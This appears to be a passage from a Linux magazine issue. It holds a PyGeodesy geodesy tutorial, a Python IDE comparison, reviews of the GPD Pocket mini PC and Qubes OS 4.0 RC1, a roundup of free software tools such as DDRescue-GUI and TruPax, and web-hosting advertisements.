list made up of LatLon objects
representing each point of interest.
You also need to include what kind
of ellipsoidal model is being used
with the LatLon input parameter.
Another task you may have with a
series of points is to define a path
along the surface of the Earth.
Very often, you’ll need to take
measurements defining these points
and simplify the path. PyGeodesy
provides several simplification
routines, of varied computational
times, that provide different levels
of simplification. Below is a basic
simplification routine:
import pygeodesy.simplify as psimp
simplified_path = psimp.simplify1(latlon_list, dist)
The first input parameter is the
original list of points, given as a list
of LatLon objects. The second input
parameter is a tolerance distance.
Any line segments below this
threshold get removed, and the list
of simplified LatLon points is returned.
This is probably the fastest, and most
inaccurate, simplification routine.
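The idea — drop any point closer than the tolerance to the last point kept — can be sketched with plain planar tuples (an illustrative stand-in, not PyGeodesy's actual routine, which works on geographic coordinates):

```python
import math

def simplify_by_distance(points, tol):
    """Keep a point only when it is at least `tol` from the last kept point."""
    kept = [points[0]]
    for p in points[1:]:
        if math.dist(p, kept[-1]) >= tol:
            kept.append(p)
    return kept

path = [(0, 0), (0.1, 0), (1, 0), (1.05, 0), (2, 0)]
short_path = simplify_by_distance(path, 0.5)
```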
Luckily, there are six other routines
available, e.g. the code below uses the
Reumann-Witkam algorithm:
simplified_path = psimp.simplifyRW(latlon_list, pipe)
The first parameter is the original list
of points to be simplified. The second
parameter is the radius, in metres, of
an imaginary pipe. This pipe is passed
over the points in the original path, and
all of the points lying within the pipe
get simplified to a single line, up to the
first point that lies outside the bounds
of the pipe. An even more complex
algorithm is the Visvalingam-Whyatt
(VW) method of simplifying a path. This
method creates triangles out of nearby
points and tries to remove any external
points if the triangle made is below
some threshold. For example:
simplified_path = psimp.simplifyVW(latlon_list, area)
The second parameter provides the
threshold area of the triangle, given in
square metres.
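The triangle test at the heart of VW can be sketched with the planar shoelace formula (PyGeodesy works on the ellipsoid, so this shows only the flat-plane intuition):

```python
def triangle_area(a, b, c):
    """Area of the triangle formed by three (x, y) points, via the shoelace formula."""
    return abs((b[0] - a[0]) * (c[1] - a[1]) - (c[0] - a[0]) * (b[1] - a[1])) / 2

# A nearly collinear middle point forms only a sliver, so VW would remove it
sliver = triangle_area((0, 0), (1, 0.01), (2, 0))
big = triangle_area((0, 0), (1, 1), (2, 0))
```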
Until now, we have looked at the
ellipsoidal sub-modules, which
model the Earth as some form of
an ellipsoid. There are also two
sub-modules which model the Earth
as a sphere: sphericalTrigonometry
and sphericalNvector. Both of these
sub-modules have their own versions
of the LatLon class, and a whole set of
module functions. The trigonometric
version creates a new LatLon object,
achieved by simply giving the values
for the latitude and longitude. The
newly created object has several
instance methods available. Below are
a few examples:
import pygeodesy.
sphericalTrigonometry as ptrig
latlon1 = ptrig.LatLon(45.00, -75.00)
# Calculate a destination
latlon2 = latlon1.
destination(dist, bearing)
# Calculate the midpoint
midpoint = latlon1.
intermediateTo(latlon2, 0.5)
The first example takes a given point
and, using a given distance and
bearing, calculates what the resulting
point would be. The second example
takes two points and returns the point
that is some ratio between the two
ends. In this example, we are looking
at a point halfway between the two
ends. Instead of defining single points
or lines, you can also define a polygon
by creating a list of LatLon objects. You
can find the area of such a polygon,
bounded by the great circles defined
by these points, with area = ptrig.
areaOf(latlon_list). This area is
given in square metres. You may want
to know whether one of the poles is
enclosed by this polygon that you have
constructed. You could find out with:
if ptrig.isPoleEnclosedBy(latlon_list):
    print('There is a pole enclosed')
If there is no pole enclosed, you may
be interested in finding the geometric
mean of this polygon with mean_point
= ptrig.meanOf(latlon_list). All
of these are also available within the
Nvector version, as well. This version
uses N-vectors to define points and
do the calculations. These underlying
calculations are much easier to do
and understand than the
trigonometric versions.
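An n-vector is simply the unit vector normal to the surface at a point, which is why the maths stays so simple; a minimal sketch of the conversion from latitude/longitude in degrees:

```python
import math

def to_nvector(lat, lon):
    """Unit surface-normal (n-vector) for a latitude/longitude given in degrees."""
    la, lo = math.radians(lat), math.radians(lon)
    return (math.cos(la) * math.cos(lo),
            math.cos(la) * math.sin(lo),
            math.sin(la))

equator = to_nvector(0, 0)      # points along the x axis
north_pole = to_nvector(90, 0)  # points along the z axis
```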
We’ve not mentioned other methods
that can be used, such as trilaterate,
but as you can see, there’s lots of
portable computing power that you
can bring to bear.
What if you need to do more?
While PyGeodesy provides a lot of core
functionality, people doing research will always
need to do something new. Many of the underlying
calculations are done using NumPy. You can tap
into these underlying structures directly to add
your own algorithms. You may have some complex
calculation that gives you a NumPy array made
up of sets of latitude and longitude points. For
example, you might have a GPS unit feeding in data
over a USB which is then massaged through some
form of correction algorithm. You will likely want to
make these calculations through NumPy. Once they
are done, you can wrap them with a Numpy2LatLon
class to hand them in to the PyGeodesy module.
As an example, say you had a NumPy array that
contains the bounding points of a polygon. You
could calculate the area with the following code:
import pygeodesy.points as pp
import pygeodesy.sphericalNvector as psnv
area = psnv.areaOf(pp.Numpy2LatLon(point_array))
You may need to run in the other direction, taking
a list of LatLon objects and using them as if they
were a list of latitude and longitude values. There is
a wrapper class that helps out here. The following
example takes a list of points and counts how many
times some given point appears in the list:
point_list = pp.LatLon2psxy(latlon_list)
count = point_list.count((x, y))
In the above, x and y define a tuple. If the searched
for point doesn’t exist within the given list, the
count method throws an error. If you want to check
first, you can use the find() method to locate
the first instance of the xy point, or the findall()
method to get a list of all of the instances in the list.
The rfind() method will give you the last instance
of the searched for point. Along with the ability
to go back and forth between PyGeodesy LatLon
objects and NumPy arrays, there are a number of
helper functions available within the PyGeodesy
module. For example, the following code gives you
the dot product of three vectors:
dot_prod = pygeodesy.fdot3(a, b, c)
You should have enough core utilities to be able to
add in your own functionality when needed.
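If fdot3 is unfamiliar: it accumulates the element-wise triple products, roughly equivalent to this plain-Python sketch (PyGeodesy's version adds floating-point error compensation):

```python
def fdot3_sketch(a, b, c):
    """Sum of a[i] * b[i] * c[i] over three equal-length sequences."""
    return sum(x * y * z for x, y, z in zip(a, b, c))

result = fdot3_sketch([1, 2], [3, 4], [5, 6])  # 1*3*5 + 2*4*6
```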
Group test | Hardware | Distro | Free software
PyCharm Community Edition
Python IDEs
Take your Python programming setup to the next level and write masterful code
with ease using these dedicated Python code editors
Eric
This cross-platform IDE is written
in Python itself and supports
both Python 2 and Python 3
as well as the Qt5 and Qt4
application frameworks. Eric
bundles all the tools you need to
develop and manage a software
project, making it a strong
contender for the top spot.
PyCharm CE
The PyCharm editor is available in
two different editions. We will be
taking a look at the open-sourced
community edition. Although it
doesn’t offer the same number of
features as its proprietary sibling,
the Apache 2-licensed version
has a built-in debugger and
version control.
PyDev
While it began life as a third-party plug-in for the Eclipse
IDE, the developers recommend
using PyDev through the LiClipse
lightweight editor. Besides pure
Python, you can use PyDev to
write code in CPython, Jython
and IronPython, which also offers
several other conveniences.
Thonny
The editor that’s now the official
Python IDE on the Raspbian
distro for the Raspberry Pi is
designed keeping in mind the
needs of beginners. It looks plain
and uninspiring compared to the
other candidates, but bundles
all the features you need to write
Python more efficiently.
PyCharm CE
Brimming with features but needs
the benefit of a better interface
A professional code editor that does
it all, but at the cost of usability
■ The IDE’s development toolset includes a UI browser, an icon editor
and even a fully fledged web browser
■ PyCharm boasts support for scientific Python libraries including
Anaconda, NumPy and Matplotlib
Coding essentials
Coding essentials
If there’s one thing you can be sure of in Eric, it’s that it bundles all
the coding conveniences you’d expect from an IDE. Its debugger can
debug multithreaded apps, while the interactive shell has syntax
highlighting and autocompletion. It also includes code checkers that
weed out style and syntax errors.
PyCharm IDE includes all the coding conveniences you would expect
from a mature IDE. It’s got a fully functional debugger, and the editor
helps you complete, auto-indent and format code, and can highlight
errors on-the-fly. It also bundles several options to easily navigate
complex coding projects.
Eric integrates Qt Designer and other components that help you
create and preview Qt-based graphical user interfaces. It also
offers integrated version control for Mercurial, Subversion and
Git. The IDE can be used to manage complex coding projects and
allows for collaborative editing. Eric also bundles the rope Python
refactoring library.
Another area of excellence. PyCharm includes very useful code
refactoring options that’ll scan the code and offer suggestions
and reminders in real time. The IDE also offers unified support for
several version control systems including Git, Subversion, SVN and
Mercurial. However, unlike Eric, PyCharm doesn’t offer the same kind
of assistance to create graphical interfaces.
You can expand the IDE’s core features by adding new functionality
using the IDE’s very elaborate plug-ins mechanism. A default
installation uses about 20 plug-ins and you can install over 40 more
from its repository. The plug-ins range from simple GUIs for the pip
command to adding support for creating Django projects.
The Community Edition build of PyCharm has over 800 plug-ins,
arranged in categories such as admin tools, graphics and unit testing.
You can access and install them either from within the IDE or from
the editor’s website. However, the plug-ins are in various stages of
development and some might not even work on Python projects.
The main window of the application is fairly cluttered, featuring
several different horizontal and vertical panels. While they’ll surely
help experienced users get a better view of their comprehensive
coding project, it’ll also undoubtedly end up overwhelming new users.
The IDE lets you edit the interface, but using the editor will still feel
like overkill for most coders.
Since PyCharm is designed for managing complex coding projects,
its interface – much like Eric’s – is very noisy. That said, while it might
still intimidate a new user, PyCharm’s UI is somewhat more intuitive
than Eric’s, probably because of the less numerous and better
labelled menus and windows. You’ll still have to leaf through its docs
to use it productively.
The unending list of assistive tools and functions
will surely attract coders working on complex
Python projects. And just as surely, its cluttered
interface will end up driving away first-timers.
Another IDE for organising and working on complex
coding projects that’s easier on the eyes compared
to the previous one, but still overkill for a vast
number of amateur Python coders.
Caught between being an open
source plug-in and a proprietary IDE
An approachable and feature-rich
IDE that has a sparse appearance
■ You can use PyDev either by plugging it into Eclipse or via its
standalone crowdsourced LiClipse IDE
■ Thonny stands out from the others with its smattering of buttons and a
mere handful of menus, but plug-ins are on hand if you need them.
Coding essentials
Coding essentials
Just because PyDev ships as a plug-in, don’t assume it’s short on
features. You’ll get all the usual IDE conveniences with PyDev that
you get with the other standalone editors such as syntax highlighting,
code completion/folding and more. On top of it, PyDev includes a
remote debugging server to debug remote programs as well.
It has pretty much everything a beginner would need. Code
completion works well and syntax highlighting is good. Its debugging
mode is pretty special and steps through the code so you can look into
how expressions are evaluated. Function calls are displayed within a
new window, with a separate local variables table and code pointer.
Similarly, PyDev bundles code analysis features as well to help avoid
inadvertent errors in your programs. PyDev also includes functional
code refactoring that enables you to quickly fold code into custom
methods. With PyDev you also get wizards to create Google App
Engine and Django projects. Also integrated is the PyLint code
quality checker.
Because of its goal, don’t expect the same conveniences from Thonny
as with other IDEs. Thonny can highlight variable occurrences to help
users avoid typos and also distinguishes local variables from global
ones. When you write object-oriented code, you can select objects in
the Heap or Variables window and use the Object Inspector to check
their type and attributes.
Since it is distributed as a plug-in to the venerable (and monstrous)
Eclipse IDE, you can take advantage of Eclipse’s marketplace to add
new features. Support for version control systems like Subversion
can be added via plug-ins. However, many plug-ins will only offer
conveniences for Eclipse’s primary programming language, Java.
According to its developer, Thonny has a simple infrastructure for
fleshing the editor with plug-ins. Currently there’s also one plug-in
that adds support for BBC micro:bit to the IDE. Thonny also has a
graphical interface to Python’s pip package manager that enables you
to install additional Python packages and libraries.
Setting up PyDev requires more effort than the other IDEs, since it
involves installing the Eclipse editor. The PyDev interface is bolted
onto Eclipse’s multi-window interface which is chock-full of icons.
Unless you are already used to working with Eclipse, getting to grips
with its interface doesn’t offer the same returns as with the other
IDEs here.
This is one area where Thonny trumps the rest. It’s very easy to install
and there’s absolutely no learning curve involved in using the IDE.
You can fire up Thonny and start punching out code, irrespective
of your skill level. The IDE has a simple menu structure with limited
options and you can add new views to the interface in line with your
experience and the requirements of your code.
Despite being available as a plug-in, PyDev can
stand up to the other standalone editors in this
group test. However, all things considered, it’ll only
be useful to people who already work with Eclipse.
By far one of the most approachable IDEs that will
help you hone your Python skills. Its set of features
is aligned with its goal of tutoring Python learners
and its debugger deserves a mention.
In brief: compare and contrast our verdicts
Bundles all the
coding functions you
will ever need and
then some.
Includes features
to help create GUI
elements and manage
large projects.
Offers a neatly
categorised list of over
40 plug-ins to flesh out
the IDE.
The weakest point of
the editor, which will
force users to skim
through the docs.
A future-proof IDE
that will work for the
widest range of users
– but it’s not pretty.
PyCharm CE
The IDE is brimming
with helpful features
that will help you to
code productively.
Just falls short of
Eric in terms of the
conveniences that it
offers to coders.
The CE version offers
over 800 plug-ins, though
some might not work
with Python.
Has a slightly better
user interface than
Eric, but still has
its peculiarities.
A sophisticated IDE with
a busy interface that will
take some getting used to
for most users.
Ships as a plug-in to
Eclipse, but it’s still got
nearly every trick in
the book.
Bundles code
analysis features
and wizards to create
Django projects.
As a plug-in to one of
the most popular IDEs,
Eclipse, it has no dearth
of plug-ins.
Setting up requires
more effort than the
rest and its UI isn’t
very intuitive.
As a plug-in to Eclipse,
PyDev actually makes
a lot more sense for
existing Eclipse users.
Has all the features
that will help new
users get to grips
with Python.
Doesn’t offer the same
general-purpose coding
assists as the other
IDEs here.
Currently offers
just one plug-in, but
bundles a GUI for the
pip package manager.
In stark contrast to
the others, Thonny
makes it very easy to
begin coding.
A cleverly designed IDE
that will help nurture
the skills of newcomers
to Python.
You might be surprised by our choice,
especially considering Eric’s rather busy
and unintuitive interface. But unlike some
of the other classes of software, we prefer
our IDE to offer us more features instead of
being aesthetically pleasing. A code editor
is a specialised piece of software and you
can’t avoid flipping through its manual to
get the most out of it. All editors apart from
Thonny require you to spend some time with
the documentation to master their respective
nuances. Eric tops the rest because it’ll
expose functionality that will cater to a large
number of users.
Thonny rules itself out because of its
limited focus. Hands down it’s the best IDE
for anyone who’s new to Python. It’s got the
right number of features that are exposed
through just enough of a user interface so
as to not overwhelm new users. That said,
given its narrow focus, it'll be of limited use
for someone who codes for a living. PyDev
takes itself out of contention as it requires
too much work to set up. Furthermore, for
someone not familiar or comfortable with
Eclipse, PyDev just doesn’t offer the same
return on investment that you get with the
other code editors.
Above Eric includes a very detailed Preferences dialog that enables you to customise various aspects of the IDE
That leaves us with PyCharm and Eric.
While PyCharm has the more intuitive
interface of the two, you can’t use either
productively without reading through the
documentation. However, once you’ve
spent some time orienting yourself, you’ll
find Eric to be a more encompassing IDE
than PyCharm, or any of the others for that
matter. This is especially true for creating
graphical interfaces, which is a walk in the
park with Eric. You’ll also be able to use the
IDE to work collaboratively on projects and
code more efficiently.
Mayank Sharma
The source for tech buying advice
GPD Pocket
Above A fan vent sits alongside
the expansion ports for the copper
heat-pipe cooling system
GPD Pocket
CPU: Intel Atom x7-Z8750 1.6GHz
Display: 7-inch 1920×1200 IPS
Graphics: Intel HD 405
Storage: 128GB eMMC
Ports: USB C, USB A 3.0, Micro HDMI,
3.5mm headphone jack
Connectivity: 2.4GHz/5GHz 802.11ac
2×2 MIMO Wi-Fi, Bluetooth 4.0
Battery: 7000mAh with USB-PD
charging support
Weight: 480g (magnesium alloy body)
Size: 180×106×18.5mm
The UMPC (ultra-mobile PC) is back in the form of the
small yet perfectly formed GPD Pocket
Around ten years ago, the computing world was
obsessed with the idea of ultra-mobile PCs
(UMPCs). Although there were some impressive
devices for the time (the Sony Vaio and Toshiba
Libretto, for example), the reality was that
the technology wasn’t available to make the
machines viable for most users. The small
screens were low resolution and low quality,
processors were power hungry and ran hot and,
most importantly, battery technology meant an
hour or two of runtime at best. Now that technology
has moved on and it’s much more feasible to create
tiny PCs, we don’t tend to see them – smartphones
and tablet PCs more commonly fulfil that need.
A relatively unknown Chinese company is looking
to change that, with the GPD Pocket mini PC –
complete with Ubuntu support.
The GPD Pocket was initially launched on
crowdfunding site Indiegogo. Not only did the campaign
hit 1,516% of its target, with $3.5m raised, but the firm
in question – GPD – was also able to build upon
previous experience of making these types of devices
to bring the Pocket to fruition (its previous product,
the GPD Win, was a popular 5.5-inch Windows-based gaming machine).
Before we dive into the details, it’s important
to understand that devices of this type are about
compromises. It’s not possible to cram a top-end
desktop PC into a tiny chassis, but the key to making
a successful product is compromising in the right
places so as to provide a good overall experience –
so has GPD made the right calls?
Left The silver finish could easily be mistaken
for that of an Apple product. Fit and finish is excellent too
The balance between capability and efficiency is
spot on – battery life is seven hours in reality, which is
extremely impressive
At the heart of the Pocket sits the Intel Atom
x7-Z8750 processor with HD405 graphics. While
your immediate reaction may be to baulk at the
mention of an Atom processor, it’s worth noting
that the Z8750 is a quad-core, 64-bit CPU from
the Cherry Trail family, built on the 14nm process
with a standard 1.6GHz clock speed and burstable
2.56GHz max. Backed by 2MB of on-board cache,
the processor proves impressively capable,
particularly for a 2W part. Performance is also
helped by 8GB of LPDDR3-1600 memory and 128GB
of storage (albeit eMMC rather than SSD). The
balance between capability and efficiency is spot
on – although claimed battery life is 12 hours, this
is more like seven hours in reality, which is still
extremely impressive. The GPD Pocket display is also
a particular highlight. The 7-inch 1,920×1,200 16:10
screen packs 323 pixels per inch and is impressively
sharp with responsive multi-touch. The top and
bottom bezels are tiny, while the side bezels are
larger to facilitate space for the keyboard. Unusually,
the Pocket doesn’t include any sort of camera at all,
so video calls are out of the question.
Selecting the right hardware might be the simple
part of the equation when compared to getting the
keyboard right. There’s simply no avoiding the fact
that there’s not a lot of space for a full keyboard and
so input on the Pocket will take some getting used
to. The layout is somewhat shifted to the left, some
of the key sizes are a little unusual and of course
things are more cramped than on a conventional
QWERTY. Crucially though, the keys have plenty
of travel and are responsive – after a few hours of
typing, you’ll be surprised how good the machine is
to use. The keys are far superior in feel to devices
such as Apple’s MacBook for example.
A healthy array of ports provides excellent
connectivity – charging is via the USB C port and
USB A is still present. A good old-fashioned 3.5mm
headphone port is included, as is a micro HDMI
port allowing you to use the Pocket to power a
larger screen.
GPD initially shipped the Pocket with Windows 10
Home before making an Ubuntu 16.04 image
available. The factory image works fine, but the best
aspect of the machine is the excellent community-based support (primarily via /r/gpdpocket on Reddit)
that has already sprung to life. Images to install
multiple versions of Linux are available, with full
hardware support and improved performance over
stock. A vibrant discussion around software and
hardware tweaks serves to make the Pocket an even
better enthusiast’s machine than it already is.
Paul O’Brien
Surprisingly good performance
and a healthy spec sheet
complemented by a beautiful
screen, exceptional build
quality and generous ports.
The keyboard takes some
getting used to and the cooling
fan can be aggressive; and
it’s quite expensive.
The GPD Pocket is a
compromise – this type
of product always will
be – but it’s done well.
As a full PC experience
you can fit in your jacket
pocket, nothing else
really comes close.
Windows on ARM will
drive new devices in
this form factor, though,
so the market is
set to explode in
the near future.
Qubes OS 4.0 RC1
Above You’ll have to manually
earmark apps to AppVMs as it only
has a handful set by default
Qubes OS 4.0 RC1
Edward Snowden’s favourite distribution gets a
comprehensive update
32GB disk space
64-bit Intel or AMD processor
Available from:
In the six years of its existence, Qubes OS has
established itself as arguably the most popular
security-centric distribution. The reason is that
the distro is unique in its approach of isolating
the several essential elements that constitute an
operating system inside different virtual machines.
Essentially, this compartmentalisation helps contain
the fallout in the event of a security breach.
The developers have recently unveiled the first
release candidate of Qubes OS v4.0, which has been
under development for over a year now. The majority
of the changes in this release are behind the scenes,
though many also manifest themselves as changes
to how users interact with the distro.
The early years of Qubes OS were spent adding
features and functionality that invariably led to the
code getting increasingly complex and messy. One
of the essential talking points of this release is the
rewritten back-end, which is more modular and
extensible. Two enhancements that the developers
credit to this code cleanup are the improved firewall
interface that allows more rules and doesn’t
Above Qubes OS likes to compartmentalise things. To copy or open a file in another VM, you right-click a file inside the file manager
The biggest change in this release is that the project has
ditched paravirtualisation and switched to full virtualisation
interfere with other firewall tools, and the ability to
create multiple disposable VMs.
Perhaps the biggest change in this release is
that the project has ditched paravirtualisation
(PV) and switched over to full virtualisation. Two
critical Xen vulnerabilities forced the team to move
away from PV. The move towards hardware-aided
virtualisation was also supported by the fact that
nearly all recent processors support Second Level
Address Translation (SLAT) virtualisation extensions.
However, this is just a stop-gap measure and Qubes
OS will switch to a new PVH mode that promises
the best characteristics of all virtualisation modes,
as soon as support for the mode improves in the
mainline Linux kernel.
On the visual side of things, the developers have
tried to simplify the management of a Qubes OS
installation by making the user experience more
coherent. One of the most important steps in this
direction is the removal of the Qubes Manager app
whose duties have now been delegated to apps in
other logical places. For example, there’s a Qubes
Manager widget in the system tray that enables you
to monitor and manage AppVMs.
All the VMs in the Qubes main menu now list a VM
Settings entry. This leads to a multi-tabbed settings
panel from where you can control various aspects
of that VM. Settings that affect the operation of
Qubes OS as a whole have been moved to a separate
app named Qubes Global Settings; there’s also a
separate app for creating new custom AppVMs.
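For those who prefer the command line, the same management tasks can also be scripted with Qubes' own tools from dom0 and the AppVMs. The sketch below is illustrative only – the template and VM names are assumptions, not guaranteed defaults:

```shell
# In dom0: create a new AppVM from a template, tagged with a colour label
qvm-create --class AppVM --template fedora-26 --label red banking

# Inside a running AppVM: send a file to another VM; dom0 asks for
# confirmation before the copy is allowed to cross the VM boundary
qvm-copy-to-vm vault ~/Documents/statement.pdf
```

That confirmation prompt is part of the same compartmentalisation model: no VM can push data into another without explicit approval.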
All this enhancement comes at a price, however.
Qubes OS has always required more resources than
a typical Linux distro. The latest release has raised
the minimum system requirements a notch. You’ll
now need at least a 64-bit Intel or AMD processor
with support for Intel VT-x with EPT or AMD-V with
RVI. Also, while you can get things done with 4GB of
RAM, at least 8GB is needed to use it productively.
While Qubes OS looks and feels like your average
Xfce-based Linux distro, it isn’t designed as a multi-user system. The user that logs into Dom0 controls
the whole system. Furthermore, Qubes OS currently
doesn’t virtualise OpenGL as that would introduce
a great deal of complexity to the GUI virtualisation
infrastructure, so don’t expect to play Steam games
inside an AppVM of their own just yet.
Mayank Sharma
Provides a streamlined user and
administration experience with
cleaner menus and logically
arranged settings options.
The security enhancements
come at the price of higher
resource requirements and a
steep learning curve.
Old legacy management
apps have been replaced
by new settings windows
and applets that will
also make sense to new
users. Back-end code
has also been cleaned
up. Using Qubes OS
involves a learning curve,
but once mastered
it’ll make you
virtually immune
to attacks.
Fresh free & open source software
OpenShot 2.4
The easy-to-use cross-platform video editor
Editing videos on Linux is perhaps
at a similar point to where gaming on
Linux was before the arrival of Steam
– possible but not very popular. This
is strange considering that unlike the pre-Steam
gaming era, there are quite a few feature-rich open
source video editors within your distribution or
its repositories. One of the easiest to get to grips
with is OpenShot 2.4, which is a stability-focused
release with a majority of the work behind the
scenes quashing bugs. That said, the release also
improves several existing functions and adds a few
new ones as well. One of the highlighted changes
is the improvement to how the editor keeps track
of changes. By storing the undo/redo actions in a
file, the new version also elevates the usability of
the automatic save system. The image sequence
exporting capabilities have been expanded and now
support JPG, PNG, BMP, PPM and various other
image formats as well as ‘Audio Only’ and ‘Video
Only’ export options. The major new addition to this
release is the ability to quickly insert freezes into the
video clips thanks to the new Freeze and Freeze &
Zoom presets option.
Above OpenShot is also available as an AppImage binary that’ll run on any Linux distro without installation
Packs in quite a bit of
functionality within
its very usable and
unassuming interface.
Despite its intuitive interface,
there’s a learning curve to
master before you can use
it productively.
Great for…
Giving a professional touch to
your home videos.
TruPax 9B
Easily pack multiple files inside industry-standard encrypted silos
You can encrypt entire partitions
using the installers of many desktop
distributions. However, this might be
overkill if all you want to do is keep
a handful of files away from prying eyes. Using
TruPax, you can easily pack individual files into
VeraCrypt/TrueCrypt compatible containers. But
why would you use TruPax when you can just as
easily use the fairly intuitive VeraCrypt app itself?
For one, when creating containers with VeraCrypt
you need to have some idea about the size of files
it’s going to house. Once created, this encrypted
container cannot be resized, which is particularly
painful when you find that it doesn’t have enough
space for the files. On the other hand, when you
select the files you wish to encrypt with TruPax,
it creates a container of exactly the same size as
the selected files. Optionally, however, you can
ask the tool to add some more free space to the
encrypted volume if you think you’ll need it later
on. Despite the fact that TruPax has been under
development for quite some time, you won’t find it
in the repositories of popular distributions. So grab
the compressed archive from its website and extract
it. Then call the ./ script to anchor the app
to /opt/trupax/ as well as to the application menu.
The app’s graphical interface is fairly intuitive to
operate – just select the files and folders you want
to encrypt, give the container a name and press the
‘Make Volume’ button.
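As the containers are VeraCrypt/TrueCrypt-compatible, you can open them afterwards with VeraCrypt itself. Here's a rough sketch, assuming the veracrypt command-line tool is installed; the file and mount paths are illustrative:

```shell
# Mount the TruPax-made container in text mode; VeraCrypt prompts
# for the volume password
veracrypt --text mysilo.tc /mnt/secret

# Dismount the volume again once you're done with the files
veracrypt --text --dismount /mnt/secret
```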
Save disk space by creating
encrypted silos that are just the
right size for your selected files.
Unlike VeraCrypt, TruPax
creates encrypted containers,
not hidden volumes.
Great for…
Parking multiple files into
portable encrypted volumes.
DDRescue-GUI 1.7.1
Use the powers of ddrescue from the convenience of a GUI
If you’ve ever lost data due to
hardware failure, chances are you
have been asked to make block-level
copies of the failing drive first with
the venerable ddrescue utility before attempting
to rescue data. The best thing about ddrescue is
that it doesn’t write zeros to the output when it runs
into bad sectors in the input. So, every time you
run it on the same output file, it tries to fill in the
gaps without wiping out the data already rescued.
The only downside is that ddrescue is a CLI utility
and you need to read through its man page before
you can use it productively. DDRescue-GUI, as the
name suggests, wraps the powerful utility inside
a graphical interface. This significantly lowers the
entry barrier and makes ddrescue accessible to
a whole lot of users. DDRescue-GUI is written in
Python and has a very low footprint, which makes
it usable on older computers as well. The utility’s
interface, which is inspired by the now deprecated
KDiskRescue tool, shouldn’t intimidate new users
and its workflow is fairly straightforward. Just fire up
the tool and select the disk that needs to be imaged
and the destination where the image needs to be
saved. For a more effective recovery process, you
should also specify the location for saving a log file
that not only speeds up the imaging process but also
comes in handy when you want to restore the image.
You’ll find precompiled binaries and source on the
project’s Launchpad page.
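For reference, the CLI workflow that DDRescue-GUI wraps looks roughly like the following. The device and file names are illustrative – double-check which drive is the failing one before running anything like this:

```shell
# First pass: copy everything that reads cleanly, skip the slow scraping
# phase, and record progress in a map (log) file
sudo ddrescue -n /dev/sdb rescued.img rescue.map

# Second pass: revisit only the bad areas, retrying each up to three times;
# the map file ensures already-rescued data is never re-read or overwritten
sudo ddrescue -r3 /dev/sdb rescued.img rescue.map
```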
The graphical user interface
makes ddrescue accessible to
inexperienced users.
The GUI doesn’t expose all the
functionalities offered by the
CLI ddrescue utility.
Great for…
Quickly making a block-level
copy of a dying disk.
Rambox 0.5.12
Bring all communications
under one roof
Virtually all desktop distributions ship
with a default messaging app that
allows you to sign into multiple online
messaging services. While a great help,
these apps support only a handful of popular services.
Rambox, on the other hand, has a much wider
mandate. With its latest release, you can sign into
89 online messaging and email services! The app is
fairly intuitive to use. Every added service resides
within its own tab, from where you browse the
message history, write messages to your contacts, or
use other means of communication supported by the
service. The app will also display notifications and
parks itself in the system tray. You can lock Rambox
when you step away from the computer to ensure no
one else can read your messages. Rambox also has
the ability to sync configurations if you use the app
on multiple computers. The FOSS app respects your
privacy. Instead of storing your personal information,
Rambox uses the partition:persist attribute of the
<webview> tag to create a persistent connection
with the signed-in service. The app is available
as an AppImage binary that you can use without
installation on any Linux distribution.
Above The app supports many services including Gmail, Skype, Facebook, WhatsApp and Telegram
Unifies various online
messaging services inside a
neat graphical app that’s easy
to use and install.
Can get slow and clunky
if you sign into several
services, especially on
older computers.
Great for…
Tracking communications from
multiple sources.
Web Hosting
Get your listing in our directory
To advertise here, contact Kate | 01225 687439
Hosting listings
Featured host:
Use our intuitive Control
Panel to manage your
domain name
0370 321 2027
About us
Part of a hosting brand started in 1999,
we’re well established, UK based,
independent and our mission is simple
– ensure your web presence ‘just works’.
We offer great-value domain names,
cPanel web hosting, SSL certificates,
business email, WordPress hosting,
cloud and VPS.
What we offer
•Free email accounts with fraud, spam
and virus protection.
•Free DNS management.
•Easy-to-use Control Panel.
•Free email forwards –
automatically redirect your email to
existing accounts.
•Domain theft protection to prevent it
being transferred out accidentally or
without your permission.
•Easy-to-use bulk tools to help you
register, renew, transfer and make
other changes to several domain
names in a single step.
•Free domain forwarding to point your
domain name to another website.
5 Tips from the pros
Optimise your website images
When uploading your website
to the internet, make sure all of your
images are optimised for the web! Try
using software; or if using
WordPress, install the EWWW Image
Optimizer plugin.
Host your website in the UK
Make sure your website is hosted
in the UK, not just for legal reasons! If
your server is located overseas, you
may be missing out on search engine
rankings on – you can
check where your site is based on
Do you make regular backups?
How would it affect your business
if you lost your website today? It’s vital to
always make your own backups; even if
your host offers you a backup solution,
it’s important to take responsibility for
your own data and protect it.
Trying to rank on Google?
Google made some changes
in 2015. If you’re struggling to rank on
Google, make sure that your website
is mobile-responsive! Plus, Google
now prefers secure (HTTPS) websites!
Contact your host to set up and force
HTTPS on your website.
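If your host runs Apache with mod_rewrite enabled – a common setup on cPanel hosting – forcing HTTPS can be as simple as a short .htaccess fragment along these lines (a generic sketch, not specific to any host's control panel):

```apache
RewriteEngine On
# Redirect every plain-HTTP request to its HTTPS equivalent
# with a permanent (301) redirect
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]
```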
David Brewer
“I bought an SSL certificate. Purchasing is painless, and
only takes a few minutes. My difficulty is installing the
certificate, which is something I can never do. However,
I simply raise a trouble ticket and the support team are
quickly on the case. Within ten minutes I hear from the
certificate signing authority, and approve. The support
team then installed the certificate for me.”
Tracy Hops
“We have several servers from TheNames and the
network connectivity is top-notch – great uptime and
speed is never an issue. Tech support is knowledgeable and
quick in replying – which is a bonus. We would highly
recommend TheNames. ”
Avoid cheap hosting
We’re sure you’ve seen those TV
adverts for domain and hosting for £1!
Think about the logic… for £1, how many
clients will be jam-packed onto that
server? Surely they would use cheap £20
drives rather than £1k+ enterprise SSDs!
Remember: you do get what you pay for!
J Edwards
“After trying out lots of other hosting companies, you
seem to have the best customer service by a long way,
and all the features I need. Shared hosting is very fast,
and the control panel is comprehensive…”
SSD web hosting
Supreme hosting
0843 289 2681
0800 1 777 000
Since 2001, Bargain Host has
campaigned to offer the lowest possible
priced hosting in the UK. It has achieved
this goal successfully and built up a
large client database which includes
many repeat customers. It has also
won several awards for providing an
outstanding hosting service.
CWCS Managed Hosting is the UK’s
leading hosting specialist. It offers a
fully comprehensive range of hosting
products, services and support. Its
highly trained staff are not only hosting
experts, they’re also committed to
delivering a great customer experience
and passionate about what they do.
• Colocation hosting
• 100% Network uptime
• Shared hosting
• Cloud servers
• Domain names
Value Linux hosting
Value hosting | 0800 035 6364
02071 838250
WordPress comes pre-installed
for new users or with free
managed migration. The
managed WordPress service
is completely free for the
first year.
We are known for our
